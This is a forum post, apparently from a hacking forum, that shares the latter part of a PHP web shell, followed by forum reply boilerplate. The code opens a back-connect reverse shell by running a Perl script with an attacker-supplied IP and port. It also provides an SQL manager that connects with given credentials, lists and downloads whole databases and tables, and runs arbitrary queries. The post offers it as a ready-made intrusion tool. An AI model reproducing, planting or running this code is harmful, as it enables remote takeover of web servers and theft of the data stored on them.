echo "<b>[+] Perms Changed<br></b>";
} else {
echo "<b>[-] Not priviligies to changed permissions</b><br>";
}
echo "<b>[+] Loading Shell</b><br><br><br>";
echo "<fieldset>";
if (!system("cd /tmp;perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
echo "<script>alert('Error Loading Shell');</script>";
}
echo "</fieldset>";
}
} else {
echo "<br><b>[-] Error writing in the shell<br><br></b>";
}
}
}

if (isset($_GET['sql'])) {

echo "

<h2>SQL Manager</h2><br><br>

<form action='' method=GET>
Server : <input type=text name=host value=localhost><br>
User : <input type=text name=usuario value=root><br>
Pass : <input type=text name=password value=123><br><br>
<input type=submit name=entersql value=Connect>
</form>
";

}

if (isset($_GET['entersql'])) {

if ($mysql = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password'])) {
if ($databases = @mysql_list_dbs($mysql)) {

echo "<br><br><h2>Databases Found</h2><br>";
echo "<table>";
while($dat = @mysql_fetch_row($databases)) {
foreach($dat as $indice => $valor) {
echo  "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&enterdb=".$valor.">Enter</a></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajardb=".$valor.">Download</a></td><tr>";
}	
}
echo "</table>";
} else {
echo "<script>alert('Error loading databases');</script>";
exit(1);
}
} else {
echo "<script>alert('Error');</script>";
exit(1);
}
}

if (isset($_GET['enterdb'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['enterdb']);
$tablas = mysql_query("show tables from ".$_GET['enterdb'])  or die("error");
echo "<br><h2>Tables Found</h2><br><br><table>";
while ($tabla = mysql_fetch_row($tablas)) {
foreach($tabla as $indice => $valor) {
echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&entertable=".$valor."&condb=".$_GET['enterdb'].">Enter</a></td></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajartabla=".$valor."&condb=".$_GET['enterdb'].">Download</a><tr>";
}	
}
echo "</table>";
}

if (isset($_GET['entertable'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['condb']);

echo "<br><h2>SQL Manager</h2>
<br><br>
<form action='' method=POST>
Consulta SQL : <input type=text name=sentencia size=70>
<br><br><br>	
<input type=hidden name=host value=".$_GET['host'].">
<input type=hidden name=usuario value=".$_GET['usuario'].">
<input type=hidden name=password value=".$_GET['password'].">
<input type=hidden name=condb value=".$_GET['database'].">
<input type=hidden name=entertable value=".$_GET['tabla'].">
<input type=submit name=mostrar value=eNViar>
</form>
<br><br><br><br><br>";

$conexion = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
mysql_select_db($_GET['condb']);

if (isset($_POST['mostrar'])) {
if(!empty($_POST['sentencia'])) {
$resultado =  mysql_query($_POST['sentencia']);
} else {
$resultado = mysql_query("SELECT * FROM ".$_GET['entertable']);
}

$numer = 0;

echo "<table>";
for ($i=0;$i< mysql_num_fields($resultado);$i++) {
echo "<th class=main>".mysql_field_name($resultado,$i)."</th>";
$numer++;
}
while($dat = mysql_fetch_row($resultado)) {
echo "<tr>";
foreach($dat as $val) {
echo "<td class=main>".$val."</td>";
}
}
echo "</tr></table>";
}
}

echo "<br><br>";

} else {


echo "
<form action='' method=POST>
user : <input type=text name=user><br>
pass : <input type=text name=pass><br><br>
<input type=submit value=Login>
</form>
";

}

// ¿ The End ?

?>

Edited by io.kent
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...